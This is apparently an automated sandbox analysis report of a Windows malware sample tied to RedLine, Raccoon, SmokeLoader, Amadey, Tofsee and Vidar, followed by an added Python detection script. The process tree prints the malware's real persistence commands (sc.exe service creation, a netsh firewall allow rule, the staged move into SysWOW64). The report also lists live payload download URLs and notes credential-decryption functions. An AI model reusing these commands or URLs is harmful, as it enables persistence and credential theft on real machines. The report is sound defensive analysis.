Windows Analysis Report: sbxGIUIhRd.exe

Overview

General Information

Sample Name: sbxGIUIhRd.exe
Analysis ID: 553170
MD5: f768f4a81e8b87d6990895a35b8d7d6c
SHA1: d0e5c1e975ec41e222f99f7a235d85317a1be3a7
SHA256: 164149035d4a3d2edba76c0601f6f83e04d45d7c057d221130c57fc9b13fd5b5
Tags: exe, RedLineStealer
Detection

Detected families: Amadey, Raccoon, RedLine, SmokeLoader, Tofsee, Vidar
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Amadey's stealer DLL
Detected unpacking (overwrites its own PE header)
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Sigma detected: Suspect Svchost Activity
Multi AV Scanner detection for submitted file
Benign windows process drops PE files
Yara detected Vidar stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Yara detected Tofsee
Sigma detected: Copying Sensitive Files with Credential Data
Maps a DLL or memory area into another process
Found evasive API chain (may stop execution after checking mutex)
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Found evasive API chain (may stop execution after checking locale)
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Drops executables to the windows directory (C:\Windows) and starts them
Checks if the current machine is a virtual machine (disk enumeration)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Yara detected BatToExe compiled binary
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
.NET source code contains method to dynamically call methods (often used by packers)
PE file has nameless sections
Machine Learning detection for dropped file
Modifies the windows firewall
Contains functionality to detect sleep reduction / modifications
Found evasive API chain (may stop execution after checking computer name)
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Modifies existing windows services
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Sigma detected: Netsh Port or Application Allowed
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Uses SMTP (mail sending)
Social media urls found in memory data
Found evaded block containing many API calls
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • sbxGIUIhRd.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\sbxGIUIhRd.exe" MD5: F768F4A81E8B87D6990895A35B8D7D6C)
    • sbxGIUIhRd.exe (PID: 6984 cmdline: "C:\Users\user\Desktop\sbxGIUIhRd.exe" MD5: F768F4A81E8B87D6990895A35B8D7D6C)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • 8A6B.exe (PID: 6760 cmdline: C:\Users\user\AppData\Local\Temp\8A6B.exe MD5: 277680BD3182EB0940BC356FF4712BEF)
          • WerFault.exe (PID: 6812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6760 -s 520 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • 95C6.exe (PID: 6844 cmdline: C:\Users\user\AppData\Local\Temp\95C6.exe MD5: F768F4A81E8B87D6990895A35B8D7D6C)
          • 95C6.exe (PID: 6804 cmdline: C:\Users\user\AppData\Local\Temp\95C6.exe MD5: F768F4A81E8B87D6990895A35B8D7D6C)
        • CFE8.exe (PID: 4296 cmdline: C:\Users\user\AppData\Local\Temp\CFE8.exe MD5: E1AF41681888A847863EE17BD63450A0)
        • E2A6.exe (PID: 4752 cmdline: C:\Users\user\AppData\Local\Temp\E2A6.exe MD5: E4B33586BFDB5A9CD45F3038B8F4CCBD)
          • cmd.exe (PID: 5768 cmdline: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\txlhcyih\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4692 cmdline: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • extd.exe (PID: 5016 cmdline: C:\Users\user\AppData\Local\Temp\63DA.tmp\63DB.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" "" MD5: 139B5CE627BC9EC1040A91EBE7830F7C)
          • sc.exe (PID: 4044 cmdline: C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 240 cmdline: C:\Windows\System32\sc.exe" description txlhcyih "wifi internet conection MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 6480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • sc.exe (PID: 1740 cmdline: "C:\Windows\System32\sc.exe" start txlhcyih MD5: 24A3E2603E63BCB9695A2935D3B24695)
            • conhost.exe (PID: 2216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • netsh.exe (PID: 6536 cmdline: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
            • conhost.exe (PID: 4620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • FA5C.exe (PID: 796 cmdline: C:\Users\user\AppData\Local\Temp\FA5C.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
          • FA5C.exe (PID: 1496 cmdline: C:\Users\user\AppData\Local\Temp\FA5C.exe MD5: D7DF01D8158BFADDC8BA48390E52F355)
        • 7D38.exe (PID: 6752 cmdline: C:\Users\user\AppData\Local\Temp\7D38.exe MD5: 852D86F5BC34BF4AF7FA89C60569DF13)
        • 96DB.exe (PID: 6404 cmdline: C:\Users\user\AppData\Local\Temp\96DB.exe MD5: 8B239554FE346656C8EEF9484CE8092F)
          • mjlooy.exe (PID: 6804 cmdline: "C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe" MD5: 8B239554FE346656C8EEF9484CE8092F)
        • A15C.exe (PID: 5412 cmdline: C:\Users\user\AppData\Local\Temp\A15C.exe MD5: 6E7430832C1C24C2BF8BE746F2FE583C)
          • conhost.exe (PID: 4296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 6316 cmdline: C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\63DA.tmp\63DB.tmp\63DC.bat C:\Users\user\AppData\Local\Temp\A15C.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 6228 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5420 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • adijaeg (PID: 6604 cmdline: C:\Users\user\AppData\Roaming\adijaeg MD5: F768F4A81E8B87D6990895A35B8D7D6C)
    • adijaeg (PID: 4204 cmdline: C:\Users\user\AppData\Roaming\adijaeg MD5: F768F4A81E8B87D6990895A35B8D7D6C)
  • svchost.exe (PID: 6976 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6868 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6924 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6760 -ip 6760 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4800 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • gaystiqf.exe (PID: 4588 cmdline: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d"C:\Users\user\AppData\Local\Temp\E2A6.exe" MD5: 6D07EFE4270BD10431D8E32CADCFF4E7)
    • svchost.exe (PID: 5288 cmdline: svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • adijaeg (PID: 7148 cmdline: C:\Users\user\AppData\Roaming\adijaeg MD5: F768F4A81E8B87D6990895A35B8D7D6C)
    • adijaeg (PID: 6424 cmdline: C:\Users\user\AppData\Roaming\adijaeg MD5: F768F4A81E8B87D6990895A35B8D7D6C)

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Memory Dumps

Source | Rule | Description | Author
0000000A.00000002.767064606.0000000000561000.00000004.00020000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000030.00000002.933969192.0000000000650000.00000040.00000001.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000001.00000002.719013921.0000000000580000.00000004.00000001.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000030.00000002.934394338.00000000007C2000.00000004.00000001.sdmp | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security
0000002E.00000003.893800912.00000000026D7000.00000004.00000040.sdmp | JoeSecurity_BatToExe | Yara detected BatToExe compiled binary | Joe Security
(43 entries in the full report; 5 shown)

Unpacked PEs

Source | Rule | Description | Author
16.2.95C6.exe.400000.0.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
1.0.sbxGIUIhRd.exe.400000.6.unpack | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
19.2.E2A6.exe.560e50.1.raw.unpack | JoeSecurity_Tofsee | Yara detected Tofsee | Joe Security
39.0.FA5C.exe.400000.6.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
39.0.FA5C.exe.400000.12.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
(30 entries in the full report; 5 shown)

Sigma Overview

System Summary:

Sigma detected: Suspect Svchost Activity
Source: Process started
Author: David Burkett
Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d"C:\Users\user\AppData\Local\Temp\E2A6.exe", ParentImage: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe, ParentProcessId: 4588, ProcessCommandLine: svchost.exe, ProcessId: 5288

Sigma detected: Copying Sensitive Files with Credential Data
Source: Process started
Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community
Data: Command: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\, CommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E2A6.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E2A6.exe, ParentProcessId: 4752, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\gaystiqf.exe" C:\Windows\SysWOW64\txlhcyih\, ProcessId: 4692

Sigma detected: Suspicious Svchost Process
Source: Process started
Author: Florian Roth
Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d"C:\Users\user\AppData\Local\Temp\E2A6.exe", ParentImage: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe, ParentProcessId: 4588, ProcessCommandLine: svchost.exe, ProcessId: 5288

Sigma detected: Netsh Port or Application Allowed
Source: Process started
Author: Markus Neis, Sander Wiebing
Data: Command: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, CommandLine|base64offset|contains: ijY, Image: C:\Windows\SysWOW64\netsh.exe, NewProcessName: C:\Windows\SysWOW64\netsh.exe, OriginalFileName: C:\Windows\SysWOW64\netsh.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E2A6.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E2A6.exe, ParentProcessId: 4752, ProcessCommandLine: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul, ProcessId: 6536

Sigma detected: New Service Creation
Source: Process started
Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
Data: Command: C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine: C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support, CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\E2A6.exe, ParentImage: C:\Users\user\AppData\Local\Temp\E2A6.exe, ParentProcessId: 4752, ProcessCommandLine: C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support, ProcessId: 4044
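All five Sigma matches above come from one persistence chain run by E2A6.exe (PID 4752, the process whose unpacked image matches the Tofsee Yara rule): a dropped binary is moved into a newly created subdirectory of C:\Windows\SysWOW64, registered with sc.exe as an auto-start service named txlhcyih, and a host-firewall rule is added that allows inbound connections to the 32-bit svchost.exe, which the service binary then launches with a bare command line and no "-k <group>" argument. Note that the "Copying Sensitive Files with Credential Data" match fired on the move of gaystiqf.exe, not on any credential store, so the useful reading of that cmd.exe line is persistence staging rather than credential theft. The Python below is an added example, not Joe Sandbox or Sigma code, that re-implements the three checks carrying real signal (anomalous svchost parent/command line, netsh allow rule, sc create with a binary outside the trusted system directories) as plain functions and runs them over events constructed from the process tree. ProcEvent, analyze and EVENTS are names chosen here; the parent allowlist and the trusted-directory set are deliberate simplifications of the published rules, and the event quoting has been normalised relative to the report's raw command lines.

```python
"""Process-creation checks mirroring the Sigma matches in the report above.
Added example, not Joe Sandbox or Sigma code; run over constructed events."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str = ""


def _base(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def _dir(path: str) -> str:
    return path.rsplit("\\", 1)[0].lower() if "\\" in path else ""


# Simplified allowlist (assumption): the published Sigma rule names a few more
# legitimate launchers, but services.exe is the only one needed for this report.
SVCHOST_PARENTS = {"services.exe"}
# Directories a service binary is normally installed in (assumption; sites with
# vendor services elsewhere extend this).
TRUSTED_SERVICE_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}


def check_svchost(ev: ProcEvent):
    """Flag svchost.exe not started by services.exe, or started without the
    '-k <group>' argument every real service host carries; None if clean."""
    if _base(ev.image) != "svchost.exe":
        return None
    reasons = []
    if _base(ev.parent_image) not in SVCHOST_PARENTS:
        reasons.append(f"parent is {ev.parent_image or '<none>'}")
    if not re.search(r"(^|\s)-k\s+\S+", ev.cmdline):
        reasons.append("no -k <group> argument")
    return reasons or None


def check_netsh_allow(ev: ProcEvent):
    """Return the program that a 'netsh advfirewall firewall add rule ...
    action=allow' command opens the host firewall for, else None."""
    if _base(ev.image) != "netsh.exe":
        return None
    low = ev.cmdline.lower()
    if not ("advfirewall" in low and "add rule" in low and "action=allow" in low):
        return None
    m = re.search(r'program="([^"]+)"', ev.cmdline, re.IGNORECASE)
    return m.group(1) if m else "<any program>"


def check_sc_create(ev: ProcEvent):
    """Parse 'sc create <name> binPath= "<exe> <args>"' and return
    (name, exe_path, outside_trusted_dirs); None if not a service creation."""
    if _base(ev.image) != "sc.exe":
        return None
    # The quoted binPath may itself contain \" escapes, as the report's does.
    m = re.search(r'\bcreate\s+(\S+)\s+binPath=\s*"((?:[^"\\]|\\.)*)"',
                  ev.cmdline, re.IGNORECASE)
    if not m:
        return None
    name, binpath = m.group(1), m.group(2)
    # First token ending in .exe; paths with spaces would need quote handling.
    exe = re.match(r"\s*(\S+?\.exe)", binpath, re.IGNORECASE)
    exe_path = exe.group(1) if exe else binpath.split()[0]
    d = _dir(exe_path)
    untrusted = d not in TRUSTED_SERVICE_DIRS and not d.startswith(r"c:\program files")
    return name, exe_path, untrusted


def analyze(events):
    """Run every check over every event; return (pid, check_name, detail) hits."""
    findings = []
    for ev in events:
        for name, fn in (("svchost", check_svchost),
                         ("netsh_allow", check_netsh_allow),
                         ("sc_create", check_sc_create)):
            hit = fn(ev)
            if hit is not None:
                findings.append((ev.pid, name, hit))
    return findings


# Constructed events modelled on the report's process tree (quoting normalised).
T = r"C:\Users\user\AppData\Local\Temp"
EVENTS = [
    ProcEvent(5288, r"C:\Windows\SysWOW64\svchost.exe", "svchost.exe",
              r"C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe"),
    ProcEvent(6228, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs -p",
              r"C:\Windows\System32\services.exe"),
    ProcEvent(6536, r"C:\Windows\SysWOW64\netsh.exe",
              '"C:\\Windows\\System32\\netsh.exe" advfirewall firewall add rule '
              'name="Host-process for services of Windows" dir=in action=allow '
              'program="C:\\Windows\\SysWOW64\\svchost.exe" enable=yes>nul',
              T + r"\E2A6.exe"),
    ProcEvent(4044, r"C:\Windows\SysWOW64\sc.exe",
              '"C:\\Windows\\System32\\sc.exe" create txlhcyih binPath= '
              '"C:\\Windows\\SysWOW64\\txlhcyih\\gaystiqf.exe /d\\"' + T
              + '\\E2A6.exe\\"" type= own start= auto DisplayName= "wifi support"',
              T + r"\E2A6.exe"),
    ProcEvent(4692, r"C:\Windows\SysWOW64\cmd.exe",
              f'"C:\\Windows\\System32\\cmd.exe" /C move /Y "{T}\\gaystiqf.exe" '
              "C:\\Windows\\SysWOW64\\txlhcyih\\", T + r"\E2A6.exe"),
]

if __name__ == "__main__":
    for pid, check, detail in analyze(EVENTS):
        print(pid, check, detail)
```

Running it reports the bare svchost.exe (PID 5288) on both counts, the netsh rule opening C:\Windows\SysWOW64\svchost.exe to inbound traffic, and the txlhcyih service whose binary sits in a non-standard subdirectory of SysWOW64; the legitimate "-k netsvcs -p" service host and the cmd.exe move produce nothing. The move line is the one that Sigma's credential-file rule over-matched on, and here it is left to the sc_create finding, which already names the path it was staged into.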

                          Jbx Signature Overview

AV Detection:

Yara detected Raccoon Stealer
Source: Yara match | File source: 00000029.00000002.932916871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000029.00000003.866964276.0000000004E90000.00000004.00000001.sdmp, type: MEMORY

Antivirus detection for URL or domain
Source: http://185.7.214.171:8080/6.php | URL Reputation: Label: malware
Source: http://81.163.30.181/1.exe | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/9030_1641816409_7037.exe | Avira URL Cloud: Label: malware
Source: http://185.215.113.35/d2VxjasuwS/plugins/cred.dll | Avira URL Cloud: Label: malware
Source: http://data-host-coin-8.com/files/6961_1642089187_2359.exe | Avira URL Cloud: Label: malware

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\gaystiqf.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\FA5C.exe | Avira: detection malicious, Label: HEUR/AGEN.1211353

Multi AV Scanner detection for submitted file
Source: sbxGIUIhRd.exe | Virustotal: Detection: 36%
Source: sbxGIUIhRd.exe | ReversingLabs: Detection: 48%

Multi AV Scanner detection for domain / URL
Source: http://185.215.113.35/d2VxjasuwS/index.php?scr=1 | Virustotal: Detection: 12%

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\7D38.exe | Metadefender: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\7D38.exe | ReversingLabs: Detection: 76%

Machine Learning detection for sample
Source: sbxGIUIhRd.exe | Joe Sandbox ML: detected

Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\8A6B.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\adijaeg | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B3EB.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\96DB.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CF17.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A15C.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\95C6.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\E2A6.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\BBBC.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7D38.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C487.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\gaystiqf.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\FA5C.exe | Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file
Source: 18.3.CFE8.exe.650000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 19.2.E2A6.exe.560e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 18.2.CFE8.exe.630e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 38.3.svchost.exe.284d000.3.unpack | Avira: Label: TR/Patched.Gen
Source: 35.2.gaystiqf.exe.630e50.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 35.3.gaystiqf.exe.650000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 19.3.E2A6.exe.580000.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 19.2.E2A6.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 35.2.gaystiqf.exe.400000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 38.2.svchost.exe.2360000.0.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 35.2.gaystiqf.exe.850000.2.unpack | Avira: Label: BDS/Backdoor.Gen
Source: 38.3.svchost.exe.284d000.4.unpack | Avira: Label: TR/Patched.Gen

Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00407470 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00407190 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_006376C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00634A80 CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00637760 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_006373E0 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_006379F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Unpacked PE file: 18.2.CFE8.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E2A6.exe | Unpacked PE file: 19.2.E2A6.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe | Unpacked PE file: 35.2.gaystiqf.exe.400000.0.unpack

Source: sbxGIUIhRd.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\8A6B.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49876 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49878 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49886 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000011.00000003.771800332.0000000001127000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.770525500.0000000005019000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000011.00000003.778539086.0000000005331000.00000004.00000001.sdmp
